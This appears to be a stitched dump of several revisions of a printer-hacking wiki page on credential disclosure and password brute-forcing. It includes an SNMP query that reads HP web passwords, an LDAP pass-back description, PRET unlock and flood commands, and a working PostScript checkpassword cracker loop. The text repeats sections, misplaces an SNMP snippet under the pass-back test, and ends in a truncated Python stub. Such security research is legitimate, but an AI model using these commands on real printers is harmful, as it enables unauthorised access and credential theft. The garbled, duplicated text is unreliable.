<!-- % \textbf{SNMP} % \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}] % # snmpget -v 1 -c public printed .1.3.6.1.4.1.11.2.3.9.1.1.13.0 % \end{lstlisting} % % idee: systemativally try to GET/SET this and pjl-password (1.3.6.1.4.1.11.2.3.9.4.2.1.3.5.1.0) this via PML/SNMP % % Printer-MIB, HP-LASERJET-COMMON-MIB => read more mibs, e.g. webserver-passwd % maybe download mibs for *all* printers and look for passwd-disclosure % \textbf{EWS} % Web Inferface % in the early days, saved password often within html source code % also: GSOAP and other web services --> \subsection{Credential disclosure}\label{par:eval-credential-disclosure} % obtaining web server passwords through NVRAM dumping or file system access as % It is worth emphasizing that the cracking is speed nearly independed of the network latency because % not, only very few bytes have to be sent and the bottleneck is the printer's PJL interpreter % AND because we can simply send 65535 commands at once (and maybe check for a single DISABLED response). % even when no feedback machanism is provided given a worst-case model as there is no challenge-response mechanism in place (aka check if passwort is correct, else job is canceled by pjl interpreter). instead we can just reset the password using all possible values of the keyspace. no backchannel/feedback needed. % While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself. == Brute-Force Attacks == Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. 
Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking. An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords. In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. 
For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}. \begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}] @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON \end{lstlisting} '''How to test this attack?''' ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. Note that while PJL passwords could be set on various devices, actual disk lock and/or control panel lock was only supported by the \textit{HP LaserJet 4200N}, the \textit{HP LaserJet 4250N}, the \textit{Brother MFC-9120CN} and the \textit{Konica bizhub 20p}. We are not aware if the password has any undocumented, proprietary effects on the other machines or is just a dummy variable. 
Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless. === PostScript === PostScript has similar protection mechanisms: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} </syntaxhighlight> Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. 
The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords. % on Konica, we can simply DINQUIRE the PASSWORD: % :/> lock 1 % PIN protection: 6500 % also not tehat for the dells, the dingquire command showed the password % newer devices use 2,14mio possibilities (deskjet?) \begin{table}[H] % n/a*: Brother devices extrawurst | n/a**: dell devices echo the password \begin{tabularx}{\textwidth}{|X|r|r|r|r|} \hline Printer model & \multicolumn{2}{c|}{PJL passwords} & \multicolumn{2}{c|}{PostScript passwords}\\ \cline{2-5} & key size & tests/sec & key size & tests/sec\\ \hline \hline % $2^{19}$ HP LaserJet 1200 & 16 bit & 200 & 524,280 bit & 5,000 \\ % 192.168.50.48 | PS: 170 HP LaserJet 4200N & 16 bit & 200 & 524,280 bit & 91,000 \\ % 192.168.50.30 ON ON | PS: 11 HP LaserJet 4250N & 16 bit & 130 & 524,280 bit & 100,000 \\ % 192.168.50.110 ON ON | PS: 10 HP LaserJet P2015dn & 16 bit & 1,000 & 524,280 bit & 83,000 \\ % 192.168.50.45 | PS: 12 HP LaserJet M2727nfs & 16 bit & 100 & 524,280 bit & 100,000 \\ % 192.168.50.38 | PS: 10 HP LaserJet 3392 AiO & 16 bit & 1,000 & 524,280 bit & 53,000 \\ % 192.168.50.36 | PS: 19 HP Color LJ CP1515n & 16 bit & 1,000 & 524,280 bit & 100,000 \\ % 192.168.50.42 | PS: 10 Brother MFC-9120CN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.37 ON UN | PS: BROTHER | n/a* Brother DCP-9045CDN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.34 | PS: BROTHER | n/a* Lexmark X264dn & n/a & n/a & 524,280 bit & 5,000 \\ % 
192.168.50.39 | PS: 170 Lexmark E360dn & n/a & n/a & 524,280 bit & 8,000 \\ % 192.168.50.43 | PS: 120 Lexmark C736dn & n/a & n/a & 524,280 bit & 53,000 \\ % 192.168.50.202 | PS: 19 Dell 5130cdn & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.24 | PS: 16 | n/a** Dell 1720n & n/a & n/a & 524,280 bit & 12,000 \\ % 192.168.50.44 | PS: 80 Dell 3110cn & n/a & n/a & 524,280 bit & 50,000 \\ % 192.168.50.33 | PS: HMMM | n/a** Kyocera FS-C5200DN & 16 bit & 50 & n/a & n/a \\ % 192.168.50.35 OFF OFF | PS: -- Samsung CLX-3305W & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.87 | PS: HMMM Samsung MultiPress 6345N & n/a & n/a & n/a & n/a \\ % 192.168.50.92 | PS: HMMM Konica bizhub 20p & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.123 ON UN | PS: BROTHER | n/a* OKI MC342dn & n/a & n/a & 524,280 bit & 38,000 \\ % 192.168.50.127 % \hline % Konica bizhub C454e & 16 bit & 50 & 524,280 bit & ? \\ \hline \end{tabularx} \caption{Exhaustive key search in PJL and PostScript} \label{tab:cracking-results} \end{table} --> aa53249f830d7711e49c148bcee67fdc6a9e9797 184 163 2017-01-21T12:03:47Z 134.147.24.29 0 wikitext text/x-wiki == Password Disclosure == === SNMP === Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs which are released by most printer manufacturers. 
'''How to test this attack?''' To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> $ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAAAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can send network packets to port 161/udp of the printer device. === Pass-Back Attacks === Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the [[Praeda] tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where an MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. 
If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change settings like the LDAP hostname in printer's embedded web server without authenticating. If supported Set the LDAP server in the To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> $ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAAAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can access the printer's embedded web server. This may include [[https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF]] attacker, if the web application has no CSRF protection. <!-- % \textbf{SNMP} % \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}] % # snmpget -v 1 -c public printed .1.3.6.1.4.1.11.2.3.9.1.1.13.0 % \end{lstlisting} % % idee: systemativally try to GET/SET this and pjl-password (1.3.6.1.4.1.11.2.3.9.4.2.1.3.5.1.0) this via PML/SNMP % % Printer-MIB, HP-LASERJET-COMMON-MIB => read more mibs, e.g. 
webserver-passwd % maybe download mibs for *all* printers and look for passwd-disclosure % \textbf{EWS} % Web Inferface % in the early days, saved password often within html source code % also: GSOAP and other web services --> \subsection{Credential disclosure}\label{par:eval-credential-disclosure} % obtaining web server passwords through NVRAM dumping or file system access as % It is worth emphasizing that the cracking is speed nearly independed of the network latency because % not, only very few bytes have to be sent and the bottleneck is the printer's PJL interpreter % AND because we can simply send 65535 commands at once (and maybe check for a single DISABLED response). % even when no feedback machanism is provided given a worst-case model as there is no challenge-response mechanism in place (aka check if passwort is correct, else job is canceled by pjl interpreter). instead we can just reset the password using all possible values of the keyspace. no backchannel/feedback needed. % While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself. == Brute-Force Attacks == Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. 
The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking. An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords. In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. 
With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}. \begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}] @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON \end{lstlisting} '''How to test this attack?''' ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. Note that while PJL passwords could be set on various devices, actual disk lock and/or control panel lock was only supported by the \textit{HP LaserJet 4200N}, the \textit{HP LaserJet 4250N}, the \textit{Brother MFC-9120CN} and the \textit{Konica bizhub 20p}. We are not aware if the password has any undocumented, proprietary effects on the other machines or is just a dummy variable. Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless. 
=== PostScript === PostScript has similar protection mechanisms: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} </syntaxhighlight> Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. 
The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords. % on Konica, we can simply DINQUIRE the PASSWORD: % :/> lock 1 % PIN protection: 6500 % also not tehat for the dells, the dingquire command showed the password % newer devices use 2,14mio possibilities (deskjet?) \begin{table}[H] % n/a*: Brother devices extrawurst | n/a**: dell devices echo the password \begin{tabularx}{\textwidth}{|X|r|r|r|r|} \hline Printer model & \multicolumn{2}{c|}{PJL passwords} & \multicolumn{2}{c|}{PostScript passwords}\\ \cline{2-5} & key size & tests/sec & key size & tests/sec\\ \hline \hline % $2^{19}$ HP LaserJet 1200 & 16 bit & 200 & 524,280 bit & 5,000 \\ % 192.168.50.48 | PS: 170 HP LaserJet 4200N & 16 bit & 200 & 524,280 bit & 91,000 \\ % 192.168.50.30 ON ON | PS: 11 HP LaserJet 4250N & 16 bit & 130 & 524,280 bit & 100,000 \\ % 192.168.50.110 ON ON | PS: 10 HP LaserJet P2015dn & 16 bit & 1,000 & 524,280 bit & 83,000 \\ % 192.168.50.45 | PS: 12 HP LaserJet M2727nfs & 16 bit & 100 & 524,280 bit & 100,000 \\ % 192.168.50.38 | PS: 10 HP LaserJet 3392 AiO & 16 bit & 1,000 & 524,280 bit & 53,000 \\ % 192.168.50.36 | PS: 19 HP Color LJ CP1515n & 16 bit & 1,000 & 524,280 bit & 100,000 \\ % 192.168.50.42 | PS: 10 Brother MFC-9120CN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.37 ON UN | PS: BROTHER | n/a* Brother DCP-9045CDN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.34 | PS: BROTHER | n/a* Lexmark X264dn & n/a & n/a & 524,280 bit & 5,000 \\ % 192.168.50.39 | PS: 170 Lexmark E360dn & n/a & n/a & 524,280 bit & 8,000 \\ % 192.168.50.43 | PS: 120 Lexmark C736dn & n/a & n/a & 524,280 bit & 53,000 \\ % 192.168.50.202 | PS: 19 Dell 5130cdn & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.24 | PS: 16 | n/a** Dell 1720n & n/a & n/a & 524,280 
bit & 12,000 \\ % 192.168.50.44 | PS: 80 Dell 3110cn & n/a & n/a & 524,280 bit & 50,000 \\ % 192.168.50.33 | PS: HMMM | n/a** Kyocera FS-C5200DN & 16 bit & 50 & n/a & n/a \\ % 192.168.50.35 OFF OFF | PS: -- Samsung CLX-3305W & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.87 | PS: HMMM Samsung MultiPress 6345N & n/a & n/a & n/a & n/a \\ % 192.168.50.92 | PS: HMMM Konica bizhub 20p & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.123 ON UN | PS: BROTHER | n/a* OKI MC342dn & n/a & n/a & 524,280 bit & 38,000 \\ % 192.168.50.127 % \hline % Konica bizhub C454e & 16 bit & 50 & 524,280 bit & ? \\ \hline \end{tabularx} \caption{Exhaustive key search in PJL and PostScript} \label{tab:cracking-results} \end{table} --> 8e8eff910c3926448e08bbbd3a3daa52ec9fa2a8 163 140 2017-01-18T17:57:11Z 134.147.128.156 0 wikitext text/x-wiki <!-- == Password Disclosure == Ancient (before 2003) HP printers ards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A), JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A) and older. -The Jetdirect card is being managed from HP Web Jetadmin. -A Web Jetadmin "device password" had been set on the JetDirect card. (This password must be set from Web Jetadmin and has nothing to do with the Telnet password or the SNMP Set community name) In the above situation the Web Jetadmin device password is readable as plain ASCII tekst from the JetDirect card using SNMP. 
How to check your printers for this vulnerability: use an SNMP toolkit to read the following OID from your printer:

 .iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords

(in numerical format: <code>.1.3.6.1.4.1.11.2.3.9.1.1.13.0</code>). An example on a Windows machine, using SNMPUTIL from the Windows Resource Kit:

<syntaxhighlight lang=text>
C:\>snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
Value    = String <0x41><0x42><0x43><0x44><0x45><0x46><0x3d><0x31><0x30><0x38><0x3b><0x00><0x00><0x00><0x00> ..etc...
</syntaxhighlight>

The same query with Net-SNMP:

<syntaxhighlight lang=bash>
snmpget -v 1 -c public printer .1.3.6.1.4.1.11.2.3.9.1.1.13.0
</syntaxhighlight>

The resulting string reads in ASCII: <code>ABCDEF=108;</code>. The Web Jetadmin device password is the word before the ‘=’ sign, in this case <code>ABCDEF</code>.

How to protect your printer:
# Keep the Web Jetadmin device password EMPTY (do not do this on newer cards than the ones mentioned above).
# Define a ‘Set community name’ instead.

Additional means of protection (does not address t

% Idea: systematically try to GET/SET this object and the PJL password object (1.3.6.1.4.1.11.2.3.9.4.2.1.3.5.1.0) via PML/SNMP.
% Printer-MIB, HP-LASERJET-COMMON-MIB: read more MIBs, e.g. for the web server password; maybe download MIBs for all printers and look for password disclosure.
% EWS / web interface: in the early days the saved password was often found within the HTML source code; also gSOAP and other web services (Lexmark SOAP).

== Credential disclosure ==

% Obtaining web server passwords through NVRAM dumping or file system access as
% It is worth emphasizing that the cracking speed is nearly independent of network latency, because only very few bytes have to be sent and the bottleneck is the printer's PJL interpreter, and because we can simply send all 65535 commands at once (and maybe check for a single DISABLED response).
% This holds even when no feedback mechanism is provided: there is no challenge-response mechanism in place (i.e. no check whether the password is correct, with the job cancelled by the PJL interpreter otherwise), so we can just reset the password using all possible values of the key space. No backchannel/feedback needed.

Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the ''Praeda'' tool<ref>''[http://h.foofus.net/?page_id=218 Praeda – Automated Printer Data Harvesting Tool]'', D. Heiland, Aug. 2016</ref>. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks, where ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ \cite{heiland2011passback}.
This works in setups where an MFP verifies users by querying an external LDAP server. Note that the password used to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored password, then whenever someone (e.g., the attacker herself) tries to authenticate at the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers can do harm beyond the device itself once it is integrated into a company's network. Printers and MFPs, which often offer insufficient protection, are therefore a good starting point in network penetration tests.

% While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself.

== Brute-Force Attacks ==

Besides information leaked from sources like the embedded web server, printing languages offer limited password protection mechanisms themselves. Breaking such mechanisms has priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, while the routines to set the password for a printer's embedded web server differ from model to model, they are standardized for both PJL and PostScript. Although it is not very common for end-users or even administrators to set, or even know about, these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers therefore have a motivation to crack or bypass them if necessary. PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>.
Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes; however, both passwords are of type ''string'', which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute force is very fast, as candidates can be verified by a PostScript program running on the printer itself. Performance is therefore comparable to offline cracking. An evaluation of brute-force attacks against PJL and PostScript passwords is given below. In the prototype implementation, the <code>lock</code> and <code>unlock</code> commands are used for setting and cracking passwords.

In addition to web server passwords, which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target, as they are required for some of the attacks described in this wiki. For example, the PJL disk lock shown in the listing below is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size, as demonstrated by FX and FtR of Phenoelit (2002), who were able to unlock the disk protection within six hours in the worst case. PJL interpreters have become faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535, so cracking time has decreased accordingly.
The devices in our test printer pool could verify between 50 and 1,000 passwords per second, leading to average cracking times between 30 seconds and ten minutes as shown in the table below.

PJL control panel and disk lock:

<syntaxhighlight lang=text>
@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON
</syntaxhighlight>

'''How to test this attack?'''

<syntaxhighlight lang=text>
./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> unlock
</syntaxhighlight>

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.

Note that while PJL passwords could be set on various devices, an actual disk lock and/or control panel lock was only supported by the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Brother MFC-9120CN'' and the ''Konica bizhub 20p''. We are not aware whether the password has any undocumented, proprietary effect on the other machines or is just a dummy variable. In violation of the PJL standard, the ''Brother MFC-9120CN'', the ''Brother DCP-9045CDN'' and the ''Konica bizhub 20p'' do not verify the password when locking or unlocking the control panel, rendering it practically useless.

PostScript has similar protection mechanisms: the ''SystemParamsPassword'' is used to change long-term system settings like the default paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The <code>checkpassword</code> operator, which takes either an integer or a string as input, checks against both passwords at once \cite{adobe1995supplement}.
The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,535 \cite{postscript1999language}, which theoretically allows 524,280 bit passwords. On the positive side, brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing numerical values as passwords is given below:

<syntaxhighlight lang=postscript>
/min 0 def
/max 1000000 def
statusdict begin
  % try every integer from min to max; == prints the first match, stop leaves the loop
  { min 1 max { dup checkpassword { == flush stop } { pop } ifelse } for } stopped pop
end
</syntaxhighlight>

Results are given in the table below. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates are possible because a printer's RIP is highly optimized for fast processing of PostScript code. The ''Brother MFC-9120CN'', the ''Brother DCP-9045CDN'' and the ''Konica bizhub 20p'' are exceptions: they only accept one password per second, but they also check only the very first character of the password, which effectively limits the key size to 256 possibilities or 8 bit. The ''Samsung CLX-3305W'' and the ''Samsung MultiPress 6345N'' do not allow PostScript feedback, and their printing functionality is mechanically broken, so we used a timing side channel to estimate cracking speed. The ''Kyocera FS-C5200DN'' does not support permanent PostScript passwords.

% On the Konica we can simply DINQUIRE the PASSWORD:
%   110.143.198.48:/> lock 1
%   PIN protection: 6500
% Also note that for the Dells the DINQUIRE command showed the password.
% Newer devices use 2.14 million possibilities (DeskJet?).
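Both attacks above, the blind PJL unlock job and the PostScript cracker, as example code added to this page; it is not PRET's implementation, and all names are the example's own. <code>build_pjl_unlock_job()</code> packs the whole 16 bit key space into one job that needs no feedback, <code>build_ps_crack_job()</code> generalises the numeric cracker to a list of string and integer candidates (with proper PostScript string escaping), and the <code>parse_*</code> helpers read the replies a device sends back over port 9100; the replies used below are constructed.

```python
"""Password-cracking print jobs for PJL and PostScript, as example code added
to this page (not PRET's implementation): a blind PJL unlock job covering the
whole 16 bit key space, a PostScript job that tries a candidate list with
checkpassword on the device, and parsers for the printer's replies. The
replies used below are constructed."""
import socket

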